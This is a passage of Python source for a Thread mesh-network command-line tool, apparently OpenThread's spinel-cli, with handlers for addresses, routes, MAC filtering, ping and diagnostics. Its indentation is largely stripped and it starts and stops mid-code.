print("Done")
else:
print("Error")
elif params[0] == "mle":
if len(params) == 1:
result = self.prop_get_value(SPINEL.PROP_CNTR_MLE_COUNTERS)
if result != None:
print("Role Disabled: %d" % result[0])
print("Role Detached: %d" % result[1])
print("Role Child: %d" % result[2])
print("Role Router: %d" % result[3])
print("Role Leader: %d" % result[4])
print("Attach Attempts: %d" % result[5])
print("Partition Id Changes: %d" % result[6])
print("Better Partition Attach Attempts: %d" % result[7])
print("Parent Changes: %d" % result[8])
print("Done")
else:
print("Error")
elif len(params) == 2:
if params[1] == "reset":
self.prop_set_value(SPINEL.PROP_CNTR_MLE_COUNTERS, 1)
print("Done")
else:
print("Error")
elif params[0] is None or params[0] == "":
print("mac")
print("mle")
print("Done")
else:
print("Error")
def do_discover(self, line):
"""
discover [channel]
Perform an MLE Discovery operation.
channel: The channel to discover on. If no channel is provided,
the discovery will cover all valid channels.
> discover
| J | Network Name | Extended PAN | PAN | MAC Address | Ch | dBm | LQI |
+---+------------------+------------------+------+------------------+----+-----+-----+
| 0 | OpenThread | dead00beef00cafe | ffff | f1d92a82c8d8fe43 | 11 | -20 | 0 |
Done
"""
pass
def do_eidcache(self, line):
"""
eidcache
Print the EID-to-RLOC cache entries.
> eidcache
fdde:ad00:beef:0:bb1:ebd6:ad10:f33 ac00
fdde:ad00:beef:0:110a:e041:8399:17cd 6000
Done
"""
pass
def do_extaddr(self, line):
"""
extaddr
Get the IEEE 802.15.4 Extended Address.
> extaddr
dead00beef00cafe
Done
extaddr <extaddr>
Set the IEEE 802.15.4 Extended Address.
> extaddr dead00beef00cafe
dead00beef00cafe
Done
"""
self.handle_property(line, SPINEL.PROP_MAC_15_4_LADDR, 'E')
def do_extpanid(self, line):
"""
extpanid
Get the Thread Extended PAN ID value.
> extpanid
dead00beef00cafe
Done
extpanid <extpanid>
Set the Thread Extended PAN ID value.
> extpanid dead00beef00cafe
Done
"""
self.handle_property(line, SPINEL.PROP_NET_XPANID, 'D')
def do_joiner(self, line):
"""
These commands are enabled when configuring with --enable-joiner.
joiner start <pskd> <provisioningUrl>
Start the Joiner role.
* pskd: Pre-Shared Key for the Joiner.
* provisioningUrl: Provisioning URL for the Joiner (optional).
This command will cause the device to perform an MLE Discovery and
initiate the Thread Commissioning process.
> joiner start PSK
Done
joiner stop
Stop the Joiner role.
> joiner stop
Done
"""
PSKd = ""
params = line.split(" ")
if len(params) > 0:
sub_command = params[0]
if len(params) > 1:
PSKd = params[1]
PSKd = self.prep_line(PSKd, 'U')
if sub_command == "":
pass
elif sub_command == "start":
py_format = self.prep_format(PSKd, 'U')
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_CREDENTIAL, PSKd,
py_format)
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_ENABLE, 1)
print("Done")
return
elif sub_command == "stop":
self.prop_set_value(SPINEL.PROP_MESHCOP_JOINER_ENABLE, 0)
print("Done")
return
print("Error")
def complete_ifconfig(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ifconfig command. """
map_sub_commands = ('up', 'down')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ifconfig(self, line):
"""
ifconfig up
Bring up the IPv6 interface.
> ifconfig up
Done
ifconfig down
Bring down the IPv6 interface.
> ifconfig down
Done
ifconfig
Show the status of the IPv6 interface.
> ifconfig
down
Done
"""
params = line.split(" ")
if params[0] == "":
value = self.prop_get_value(SPINEL.PROP_NET_IF_UP)
if value != None:
map_arg_value = {
0: "down",
1: "up",
}
print(map_arg_value[value])
elif params[0] == "up":
self.prop_set(SPINEL.PROP_NET_IF_UP, '1')
return
elif params[0] == "down":
self.prop_set(SPINEL.PROP_NET_IF_UP, '0')
return
print("Done")
def complete_ipaddr(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ipaddr command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ipaddr(self, line):
"""
ipaddr
List all IPv6 addresses assigned to the Thread interface.
> ipaddr
fdde:ad00:beef:0:0:ff:fe00:0
fe80:0:0:0:0:ff:fe00:0
fdde:ad00:beef:0:558:f56b:d688:799
fe80:0:0:0:f3d9:2a82:c8d8:fe43
Done
ipaddr add <ipaddr>
Add an IPv6 address to the Thread interface.
> ipaddr add 2001::dead:beef:cafe
Done
        ipaddr remove <ipaddr>
            Delete an IPv6 address from the Thread interface.
            > ipaddr remove 2001::dead:beef:cafe
            Done
"""
params = line.split(" ")
valid = 1
preferred = 1
flags = 0
# always use /64, as prefix.network.prefixlen returns /128.
prefix_len = 64
num = len(params)
if num > 1:
ipaddr = params[1]
prefix = ipaddress.IPv6Interface(str(ipaddr))
arr = prefix.ip.packed
if params[0] == "":
addrs = self.wpan_api.get_ipaddrs()
for addr in addrs:
print(str(addr))
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CLLC', prefix_len, valid,
preferred, flags)
self.prop_insert_value(SPINEL.PROP_IPV6_ADDRESS_TABLE, arr,
str(len(arr)) + 's')
if self.tun_if:
self.tun_if.addr_add(ipaddr)
elif params[0] == "remove":
arr += self.wpan_api.encode_fields('CLLC', prefix_len, valid,
preferred, flags)
self.prop_remove_value(SPINEL.PROP_IPV6_ADDRESS_TABLE, arr,
str(len(arr)) + 's')
if self.tun_if:
self.tun_if.addr_del(ipaddr)
print("Done")
def do_keysequence(self, line):
"""
keysequence counter
Get the Thread Key Sequence Counter.
> keysequence counter
10
Done
keysequence counter <counter>
Set the Thread Key Sequence Counter.
> keysequence counter 10
Done
keysequence guardtime
Get the thrKeySwitchGuardTime (in hours).
> keysequence guardtime
0
Done
keysequence guardtime <guardtime>
Set the thrKeySwitchGuardTime (in hours).
> keysequence guardtime 0
Done
"""
args = line.split(" ")
if args[0] == "counter":
newline = line.replace("counter", "")
self.handle_property(newline, SPINEL.PROP_NET_KEY_SEQUENCE_COUNTER,
'L')
elif args[0] == "guardtime":
newline = line.replace("guardtime", "")
self.handle_property(newline, SPINEL.PROP_NET_KEY_SWITCH_GUARDTIME,
'L')
def do_leaderdata(self, line):
"""
leaderdata
Get the Thread network Leader Data.
> leaderdata
Partition ID: 1987912443
Weighting: 64
Data Version: 4
Stable Data Version: 129
Leader Router ID: 47
Done
"""
partition_id = self.prop_get_value(SPINEL.PROP_NET_PARTITION_ID)
weighting = self.prop_get_value(SPINEL.PROP_THREAD_LEADER_WEIGHT)
data_version = self.prop_get_value(
SPINEL.PROP_THREAD_NETWORK_DATA_VERSION)
stable_version = self.prop_get_value(
SPINEL.PROP_THREAD_STABLE_NETWORK_DATA_VERSION)
leader_id = self.prop_get_value(SPINEL.PROP_THREAD_LEADER_RID)
if partition_id is None or \
weighting is None or \
data_version is None or \
stable_version is None or \
leader_id is None:
print("Error")
else:
print("Partition ID: %d" % partition_id)
print("Weighting: %d" % weighting)
print("Data Version: %d" % data_version)
print("Stable Data Version: %d" % stable_version)
print("Leader Router ID: %d" % leader_id)
print("Done")
def do_leaderweight(self, line):
"""
leaderweight
Get the Thread Leader Weight.
> leaderweight
128
Done
leaderweight <weight>
Set the Thread Leader Weight.
> leaderweight 128
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_LOCAL_LEADER_WEIGHT)
def do_mfg(self, line):
"""
mfg <diagnostic command>
Check all the factory diagnostic commands here:
https://github.com/openthread/openthread/blob/main/src/core/diags/README.md
For example:
Start the diagnostic module.
> mfg start
start diagnostics mode
status 0x00
        Retrieve radio statistics.
> mfg stats
received packets: 0
sent packets: 0
first received packet: rssi=0, lqi=0
last received packet: rssi=0, lqi=0
"""
result = self.prop_set(SPINEL.PROP_NEST_STREAM_MFG, line, 'U', False)
if result != None:
print(result.rstrip())
else:
print("Error")
def do_mode(self, line):
"""
mode
Get the Thread Device Mode value.
r: rx-on-when-idle
d: Full Function Device
n: Full Network Data
> mode
rdn
Done
mode [rdn]
Set the Thread Device Mode value.
r: rx-on-when-idle
d: Full Function Device
n: Full Network Data
> mode rsdn
Done
"""
map_arg_value = {
0x00: "-",
0x01: "n",
0x02: "d",
0x03: "dn",
0x08: "r",
0x09: "rn",
0x0A: "rd",
0x0B: "rdn",
}
map_arg_name = {
"-": "0",
"n": 0x01,
"d": 0x02,
"dn": 0x03,
"r": 0x08,
"rn": 0x09,
"rd": 0x0A,
"rdn": 0x0B,
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except KeyError:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_THREAD_MODE, line)
if result != None:
if not line:
print(map_arg_value[result])
print("Done")
else:
print("Error")
def do_netdata(self, line):
"""
netdata
Register local network data with Thread Leader.
> netdata register
Done
"""
params = line.split(" ")
if params[0] == "register":
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.handle_property("0",
SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE)
def do_networkidtimeout(self, line):
"""
networkidtimeout
Get the NETWORK_ID_TIMEOUT parameter used in the Router role.
> networkidtimeout
120
Done
networkidtimeout <timeout>
Set the NETWORK_ID_TIMEOUT parameter used in the Router role.
> networkidtimeout 120
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_NETWORK_ID_TIMEOUT)
def do_networkkey(self, line):
"""
networkkey
Get the Thread Network Key value.
> networkkey
00112233445566778899aabbccddeeff
Done
networkkey <key>
Set the Thread Network Key value.
> networkkey 00112233445566778899aabbccddeeff
Done
"""
self.handle_property(line, SPINEL.PROP_NET_NETWORK_KEY, 'D')
def do_networkname(self, line):
"""
networkname
Get the Thread Network Name.
> networkname
OpenThread
Done
networkname <name>
Set the Thread Network Name.
> networkname OpenThread
Done
"""
self.handle_property(line, SPINEL.PROP_NET_NETWORK_NAME, 'U')
def do_panid(self, line):
"""
panid
Get the IEEE 802.15.4 PAN ID value.
> panid
0xdead
Done
panid <panid>
Set the IEEE 802.15.4 PAN ID value.
> panid 0xdead
Done
"""
self.handle_property(line, SPINEL.PROP_MAC_15_4_PANID, 'H')
def do_parent(self, line):
"""
parent
Get the addresses of the parent node.
> parent
Ext Addr: 3ad35f9846ceb9c7
Rloc: bc00
Done
"""
ext_addr, rloc = self.prop_get_value(SPINEL.PROP_THREAD_PARENT)
if ext_addr is None or\
rloc is None:
print("Error")
else:
print("Ext Addr: {}".format(binascii.hexlify(ext_addr)))
print("Rloc: {:04x}".format(rloc))
def do_ping(self, line):
"""
ping <ipaddr> [size] [count] [interval]
Send an ICMPv6 Echo Request.
> ping fdde:ad00:beef:0:558:f56b:d688:799
16 bytes from fdde:ad00:beef:0:558:f56b:d688:799: icmp_seq=1 hlim=64 time=28ms
"""
params = line.split(" ")
addr = "::1"
_size = "56"
_count = "1"
_interval = "1"
if len(params) > 0:
addr = params[0]
if len(params) > 1:
_size = params[1]
if len(params) > 2:
_count = params[2]
if len(params) > 3:
_interval = params[3]
try:
# Generate local ping packet and send directly via spinel.
ml64 = self.prop_get_value(SPINEL.PROP_IPV6_ML_ADDR)
ml64 = str(ipaddress.IPv6Address(ml64))
timenow = int(round(time.time() * 1000)) & 0xFFFFFFFF
data = bytearray(int(_size))
ping_req = self.icmp_factory.build_icmp_echo_request(
ml64,
addr,
data,
identifier=(timenow >> 16),
sequence_number=(timenow & 0xffff))
self.wpan_api.ip_send(ping_req)
# Let handler print result
except:
print("Fail")
print(traceback.format_exc())
def complete_prefix(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for prefix command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_prefix(self, line):
"""
prefix add <prefix> [pvdcsr] [prf]
Add a valid prefix to the Network Data.
p: Preferred flag
a: Stateless IPv6 Address Autoconfiguration flag
d: DHCPv6 IPv6 Address Configuration flag
c: DHCPv6 Other Configuration flag
r: Default Route flag
o: On Mesh flag
s: Stable flag
prf: Default router preference, which may be 'high', 'med', or 'low'.
> prefix add 2001:dead:beef:cafe::/64 paros med
Done
prefix remove <prefix>
Invalidate a prefix in the Network Data.
> prefix remove 2001:dead:beef:cafe::/64
Done
"""
params = line.split(" ")
stable = 0
flags = 0
arr = ""
num = len(params)
if num > 1:
prefix = ipaddress.IPv6Interface(str(params[1]))
arr = prefix.ip.packed
if num > 2:
map_param_to_flag = {
'p': kThread.PrefixPreferredFlag,
'a': kThread.PrefixSlaacFlag,
'd': kThread.PrefixDhcpFlag,
'c': kThread.PrefixConfigureFlag,
'r': kThread.PrefixDefaultRouteFlag,
'o': kThread.PrefixOnMeshFlag,
}
for char in params[2]:
if char == 's':
stable = 1 # Stable flag
else:
flag = map_param_to_flag.get(char, None)
if flag is not None:
flags |= flag
if num > 3:
map_arg_name = {
"high": 2,
"med": 1,
"low": 0,
}
prf = map_arg_name[params[3]]
flags |= (prf << kThread.PrefixPreferenceOffset)
if params[0] == "":
self.prop_get_value(SPINEL.PROP_THREAD_ON_MESH_NETS)
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, flags)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_insert_value(SPINEL.PROP_THREAD_ON_MESH_NETS, arr,
str(len(arr)) + 's')
elif params[0] == "remove":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, flags)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_remove_value(SPINEL.PROP_THREAD_ON_MESH_NETS, arr,
str(len(arr)) + 's')
print("Done")
def do_releaserouterid(self, line):
"""
releaserouterid <routerid>
Release a Router ID that has been allocated by the device in the Leader role.
> releaserouterid 16
Done
"""
if line:
value = int(line)
self.prop_remove_value(SPINEL.PROP_THREAD_ACTIVE_ROUTER_IDS, value)
print("Done")
def do_rloc16(self, line):
"""
rloc16
Get the Thread RLOC16 value.
> rloc16
0xdead
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_RLOC16, 'H')
def do_reset(self, line):
"""
reset
Reset the NCP.
> reset
"""
self.wpan_api.cmd_reset()
self.prop_set_value(SPINEL.PROP_IPv6_ICMP_PING_OFFLOAD, 1)
self.prop_set_value(SPINEL.PROP_THREAD_RLOC16_DEBUG_PASSTHRU, 1)
def complete_route(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for route command. """
map_sub_commands = ('add', 'remove')
return [i for i in map_sub_commands if i.startswith(text)]
def do_route(self, line):
"""
route add <prefix> [s] [prf]
Add a valid prefix to the Network Data.
s: Stable flag
prf: Default Router Preference, which may be: 'high', 'med', or 'low'.
> route add 2001:dead:beef:cafe::/64 s med
Done
route remove <prefix>
Invalidate a prefix in the Network Data.
> route remove 2001:dead:beef:cafe::/64
Done
"""
params = line.split(" ")
stable = 0
prf = 0
num = len(params)
if num > 1:
prefix = ipaddress.IPv6Interface(str(params[1]))
arr = prefix.ip.packed
if params[0] == "":
self.prop_get_value(SPINEL.PROP_THREAD_LOCAL_ROUTES)
elif params[0] == "add":
arr += self.wpan_api.encode_fields('CbC', prefix.network.prefixlen,
stable, prf)
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_insert_value(SPINEL.PROP_THREAD_LOCAL_ROUTES, arr,
str(len(arr)) + 's')
elif params[0] == "remove":
self.prop_set_value(SPINEL.PROP_THREAD_ALLOW_LOCAL_NET_DATA_CHANGE,
1)
self.prop_remove_value(SPINEL.PROP_THREAD_LOCAL_ROUTES, arr,
str(len(arr)) + 's')
print("Done")
def do_router(self, line):
"""
router list
List allocated Router IDs
> router list
8 24 50
Done
router <id>
Print diagnostic information for a Thread Router.
The id may be a Router ID or an RLOC16.
> router 50
Alloc: 1
Router ID: 50
Rloc: c800
Next Hop: c800
Link: 1
Ext Addr: e2b3540590b0fd87
Cost: 0
LQI In: 3
LQI Out: 3
Age: 3
Done
> router 0xc800
Alloc: 1
Router ID: 50
Rloc: c800
Next Hop: c800
Link: 1
Ext Addr: e2b3540590b0fd87
Cost: 0
LQI In: 3
LQI Out: 3
Age: 7
Done
"""
pass
def do_routerselectionjitter(self, line):
"""
routerselectionjitter
Get the ROUTER_SELECTION_JITTER value.
> routerselectionjitter
120
Done
routerselectionjitter <threshold>
Set the ROUTER_SELECTION_JITTER value.
> routerselectionjitter 120
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_ROUTER_SELECTION_JITTER)
def do_routerupgradethreshold(self, line):
"""
routerupgradethreshold
Get the ROUTER_UPGRADE_THRESHOLD value.
> routerupgradethreshold
16
Done
routerupgradethreshold <threshold>
Set the ROUTER_UPGRADE_THRESHOLD value.
> routerupgradethreshold 16
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_ROUTER_UPGRADE_THRESHOLD)
def do_routerdowngradethreshold(self, line):
"""
routerdowngradethreshold
Get the ROUTER_DOWNGRADE_THRESHOLD value.
> routerdowngradethreshold
16
Done
routerdowngradethreshold <threshold>
Set the ROUTER_DOWNGRADE_THRESHOLD value.
> routerdowngradethreshold 16
Done
"""
self.handle_property(line,
SPINEL.PROP_THREAD_ROUTER_DOWNGRADE_THRESHOLD)
def do_scan(self, _line):
"""
scan [channel]
Perform an IEEE 802.15.4 Active Scan.
channel: The channel to scan on. If no channel is provided,
the active scan will cover all valid channels.
> scan
| J | Network Name | Extended PAN | PAN | MAC Address | Ch | dBm | LQI |
+---+------------------+------------------+------+------------------+----+-----+-----+
| 0 | OpenThread | dead00beef00cafe | ffff | f1d92a82c8d8fe43 | 11 | -20 | 0 |
Done
"""
# Initial mock-up of scan
self.handle_property("15", SPINEL.PROP_MAC_SCAN_MASK)
self.handle_property("4", SPINEL.PROP_MAC_SCAN_PERIOD, 'H')
self.handle_property("1", SPINEL.PROP_MAC_SCAN_STATE)
time.sleep(5)
self.handle_property("", SPINEL.PROP_MAC_SCAN_BEACON, 'U')
def complete_thread(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for thread command. """
map_sub_commands = ('start', 'stop')
return [i for i in map_sub_commands if i.startswith(text)]
def do_thread(self, line):
"""
thread start
Enable Thread protocol operation and attach to a Thread network.
> thread start
Done
thread stop
Disable Thread protocol operation and detach from a Thread network.
> thread stop
Done
"""
map_arg_value = {
0: "stop",
1: "start",
}
map_arg_name = {
"stop": "0",
"start": "1",
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_NET_STACK_UP, line)
if result != None:
if not line:
print(map_arg_value[result])
print("Done")
else:
print("Error")
def do_state(self, line):
"""
state
"""
map_arg_value = {
0: "detached",
1: "child",
2: "router",
3: "leader",
}
map_arg_name = {
"disabled": "0",
"detached": "0",
"child": "1",
"router": "2",
"leader": "3",
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_NET_ROLE, line)
if result != None:
if not line:
state = map_arg_value[result]
# TODO: if state="disabled": get NET_STATE to determine
# whether "disabled" or "detached"
print(state)
print("Done")
else:
print("Error")
def do_txpower(self, line):
"""
txpower
Get the transmit power in dBm.
> txpower
0
Done
txpower <txpower>
Set the transmit power in dBm.
> txpower -10
Done
"""
self.handle_property(line, SPINEL.PROP_PHY_TX_POWER, mixed_format='b')
def do_version(self, line):
"""
version
Print the build version information.
> version
OPENTHREAD/gf4f2f04; Jul 1 2016 17:00:09
Done
"""
self.handle_property(line, SPINEL.PROP_NCP_VERSION, 'U')
def complete_macfilter(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for macfilter command. """
#TODO: autocomplete the secondary sub commands
#for 'addr': 'disable', 'denylist', 'allowlist', 'add', 'remove', 'clear'
#for 'rss' : 'add', 'remove', 'clear'
map_sub_commands = ('addr', 'rss')
return [i for i in map_sub_commands if i.startswith(text)]
def do_mac(self, line):
"""
mac
Mac related commands.
mac retries direct
Get the number of transmit retries on the MAC layer.
> mac retries direct
3
Done
mac retries direct <number>
Set the number of direct transmit retries on the MAC layer.
> mac retries direct 10
Done
mac retries indirect
Get the number of indirect transmit retries on the MAC layer.
> mac retries indirect
0
Done
mac retries indirect <number>
Set the number of indirect transmit retries on the MAC layer.
> mac retries indirect 5
Done
mac ccathreshold
Get the CCA ED Threshold in dBm.
> mac ccathreshold
-10
Done
mac ccathreshold -70
Set the CCA ED Threshold in dBm.
> mac ccathreshold -70
Done
"""
params = line.split(" ")
        prop = None
        value = None
if params[0] == "retries" and len(params) > 1:
if params[1] == "direct":
prop = SPINEL.PROP_MAC_MAX_RETRY_NUMBER_DIRECT
elif params[1] == "indirect":
prop = SPINEL.PROP_MAC_MAX_RETRY_NUMBER_INDIRECT
value = params[2] if len(params) == 3 else None
elif params[0] == "ccathreshold" and len(params) > 0:
prop = SPINEL.PROP_PHY_CCA_THRESHOLD
value = None
if len(params) == 2:
value = int(params[1])
self.prop_set(prop, value, mixed_format='b')
return
        if prop is None:
            print("Error")
            return
        self.handle_property(value, prop)
def do_macfilter(self, line):
"""
macfilter
List the macfilter status, including address and received signal strength filter settings.
> macfilter
Allowlist
Done
macfilter addr
List the address filter status.
> macfilter addr
Allowlist
Done
macfilter addr disable
Disable address filter mode.
> macfilter addr disable
Done
macfilter addr allowlist
Enable allowlist address filter mode.
> macfilter addr allowlist
Done
macfilter addr denylist
Enable denylist address filter mode.
> macfilter addr denylist
Done
macfilter addr add <extaddr> [rssi]
Add an IEEE 802.15.4 Extended Address to the address filter.
> macfilter addr add dead00beef00cafe -85
Done
> macfilter addr add dead00beef00caff
Done
macfilter addr remove <extaddr>
Remove an IEEE 802.15.4 Extended Address from the address filter.
> macfilter addr remove dead00beef00caff
Done
macfilter addr clear
Clear all entries from the address filter.
> macfilter addr clear
Done
macfilter rss
List the rss filter status.
> macfilter rss
Done
macfilter rss add <extaddr> <rssi>
Set the received signal strength for the messages from the IEEE802.15.4 Extended Address.
If extaddr is \*, default received signal strength for all received messages would be set.
> macfilter rss add * -50
Done
> macfilter rss add 0f6127e33af6b404 -85
Done
macfilter rss remove <extaddr>
Removes the received signal strength or received link quality setting on the Extended Address.
If extaddr is \*, default received signal strength or link quality for all received messages would be unset.
> macfilter rss remove *
Done
> macfilter rss remove 0f6127e33af6b404
macfilter rss clear
            Clear all the received signal strength settings.
> macfilter rss clear
"""
map_arg_value = {
0: "Disabled",
1: "Allowlist",
2: "Denylist",
}
params = line.split(" ")
if params[0] == "":
mode = 0
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST_ENABLED)
if value == 1:
mode = 1
else:
value = self.prop_get_value(SPINEL.PROP_MAC_DENYLIST_ENABLED)
if value == 1:
mode = 2
print(map_arg_value[mode])
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST)
value = self.prop_get_value(SPINEL.PROP_MAC_FIXED_RSS)
if params[0] == "addr":
if len(params) == 1:
mode = 0
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST_ENABLED)
if value == 1:
mode = 1
else:
value = self.prop_get_value(
SPINEL.PROP_MAC_DENYLIST_ENABLED)
if value == 1:
mode = 2
print(map_arg_value[mode])
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST)
elif params[1] == "allowlist":
self.prop_set(SPINEL.PROP_MAC_ALLOWLIST_ENABLED, '1')
return
elif params[1] == "denylist":
self.prop_set(SPINEL.PROP_MAC_DENYLIST_ENABLED, '1')
return
elif params[1] == "disable":
self.prop_set(SPINEL.PROP_MAC_ALLOWLIST_ENABLED, '0')
return
elif params[1] == "add":
arr = util.hex_to_bytes(params[2])
try:
rssi = int(params[3])
except:
rssi = SPINEL.RSSI_OVERRIDE
arr += struct.pack('b', rssi)
self.prop_insert_value(SPINEL.PROP_MAC_ALLOWLIST, arr,
str(len(arr)) + 's')
elif params[1] == "remove":
arr = util.hex_to_bytes(params[2])
self.prop_remove_value(SPINEL.PROP_MAC_ALLOWLIST, arr,
str(len(arr)) + 's')
elif params[1] == "clear":
self.prop_set_value(SPINEL.PROP_MAC_ALLOWLIST, b'', '0s')
elif params[0] == "rss":
if len(params) == 1:
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_FIXED_RSS)
elif params[1] == "add":
if params[2] == "*":
arr = b''
else:
arr = util.hex_to_bytes(params[2])
rssi = int(params[3])
arr += struct.pack('b', rssi)
self.prop_insert_value(SPINEL.PROP_MAC_FIXED_RSS, arr,
str(len(arr)) + 's')
elif params[1] == "remove":
if params[2] == "*":
arr = b''
else:
arr = util.hex_to_bytes(params[2])
self.prop_remove_value(SPINEL.PROP_MAC_FIXED_RSS, arr,
str(len(arr)) + 's')
elif params[1] == "clear":
self.prop_set_value(SPINEL.PROP_MAC_FIXED_RSS, b'', '0s')
print("Done")
def do_ncpll64(self, line):
""" Display the link local IPv6 address. """
self.handle_property(line, SPINEL.PROP_IPV6_LL_ADDR, '6')
def do_ncpml64(self, line):
""" Display the mesh local IPv6 address. """
self.handle_property(line, SPINEL.PROP_IPV6_ML_ADDR, '6')
def do_ncpraw(self, line):
""" Enable MAC raw stream. """
self.handle_property(line, SPINEL.PROP_MAC_RAW_STREAM_ENABLED, 'B')
def do_ncpfilter(self, line):
"""
Set MAC filter mode:
0 = MAC_FILTER_MODE_NORMAL Normal MAC filtering is in place.
1 = MAC_FILTER_MODE_PROMISCUOUS All MAC packets matching network are passed up the stack.
2 = MAC_FILTER_MODE_MONITOR All decoded MAC packets are passed up the stack.
"""
self.handle_property(line, SPINEL.PROP_MAC_FILTER_MODE, 'B')
def complete_ncptun(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ncp-tun command. """
map_sub_commands = ('up', 'down', 'add', 'remove', 'ping')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ncptun(self, line):
"""
ncp-tun
Control sideband tunnel interface.
ncp-tun up
Bring up Thread TUN interface.
> ncp-tun up
Done
ncp-tun down
Bring down Thread TUN interface.
> ncp-tun down
Done
ncp-tun add <ipaddr>
Add an IPv6 address to the Thread TUN interface.
> ncp-tun add 2001::dead:beef:cafe
Done
        ncp-tun remove <ipaddr>
            Delete an IPv6 address from the Thread TUN interface.
            > ncp-tun remove 2001::dead:beef:cafe
            Done
ncp-tun ping <ipaddr> [size] [count] [interval]
Send an ICMPv6 Echo Request.
> ncp-tun ping fdde:ad00:beef:0:558:f56b:d688:799
16 bytes from fdde:ad00:beef:0:558:f56b:d688:799: icmp_seq=1 hlim=64 time=28ms
"""
params = line.split(" ")
num = len(params)
if num > 1:
ipaddr = params[1]
prefix = ipaddress.IPv6Interface(str(ipaddr))
_arr = prefix.ip.packed
if params[0] == "":
pass
elif params[0] == "add":
if self.tun_if:
self.tun_if.addr_add(ipaddr)
elif params[0] == "remove":
if self.tun_if:
self.tun_if.addr_del(ipaddr)
elif params[0] == "up":
if os.geteuid() == 0:
self.tun_if = TunInterface(self.nodeid)
else:
print("Warning: superuser required to start tun interface.")
elif params[0] == "down":
if self.tun_if:
self.tun_if.close()
self.tun_if = None
elif params[0] == "ping":
# Use tunnel to send ping
size = "56"
count = "1"
_interval = "1"
            # params[1] is the target address; optional size/count/interval follow
            if len(params) > 2:
                size = params[2]
            if len(params) > 3:
                count = params[3]
            if len(params) > 4:
                _interval = params[4]
if self.tun_if:
self.tun_if.ping6(" -c " + count + " -s " + size + " " + ipaddr)
print("Done")
def do_diag(self, line):
"""
Follows "mfg" command.
"""
self.do_mfg(line)
def _notify_simulator(self):
"""
notify the simulator that there are no more UART data for the current command.
"""
OT_SIM_EVENT_POSTCMD = 4
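        # Assumed event layout: uint64 delay, uint8 event type, uint16 payload
        # length, then the payload (here a single byte carrying the node id)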
message = struct.pack('=QBHB', 0, OT_SIM_EVENT_POSTCMD, 1,
int(self.nodeid))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(self._addr)
sock.sendto(message, self._simulator_addr)
sock.close()
def postcmd(self, stop, line):
if self.VIRTUAL_TIME:
self._notify_simulator()
return stop
def parse_args():
"""" Send spinel commands to initialize sniffer node. """
args = sys.argv[1:]
opt_parser = optparse.OptionParser(usage=optparse.SUPPRESS_USAGE)
opt_parser.add_option("-u",
"--uart",
action="store",
dest="uart",
type="string")
opt_parser.add_option("-b",
"--baudrate",
action="store",
dest="baudrate",
type="int",
default=DEFAULT_BAUDRATE)
opt_parser.add_option("--rtscts",
action="store_true",
dest="rtscts",
default=False),
opt_parser.add_option("-p",
"--pipe",
action="store",
dest="pipe",
type="string")
opt_parser.add_option("-s",
"--socket",
action="store",
dest="socket",
type="string")
opt_parser.add_option("-n",
"--nodeid",
action="store",
dest="nodeid",
type="string",
default="1")
opt_parser.add_option("-q", "--quiet", action="store_true", dest="quiet")
opt_parser.add_option("-v",
"--verbose",
action="store_true",
dest="verbose")
opt_parser.add_option("-d",
"--debug",
action="store",
dest="debug",
type="int",
default=CONFIG.DEBUG_ENABLE)
opt_parser.add_option("--vendor-path",
action="store",
dest="vendor_path",
type="string")
return opt_parser.parse_args(args)
def main():
""" Top-level main for spinel-cli tool. """
(options, remaining_args) = parse_args()
if options.debug:
CONFIG.debug_set_level(options.debug)
# Obtain the vendor module path, if provided
if not options.vendor_path:
options.vendor_path = os.environ.get("SPINEL_VENDOR_PATH")
if options.vendor_path:
options.vendor_path = os.path.abspath(options.vendor_path)
vendor_path, vendor_module = os.path.split(options.vendor_path)
sys.path.insert(0, vendor_path)
else:
vendor_module = "vendor"
# Set default stream to pipe
stream_type = 'p'
stream_descriptor = "../../examples/apps/ncp/ot-ncp-ftd " + options.nodeid
if options.uart:
stream_type = 'u'
stream_descriptor = options.uart
elif options.socket:
stream_type = 's'
stream_descriptor = options.socket
elif options.pipe:
stream_type = 'p'
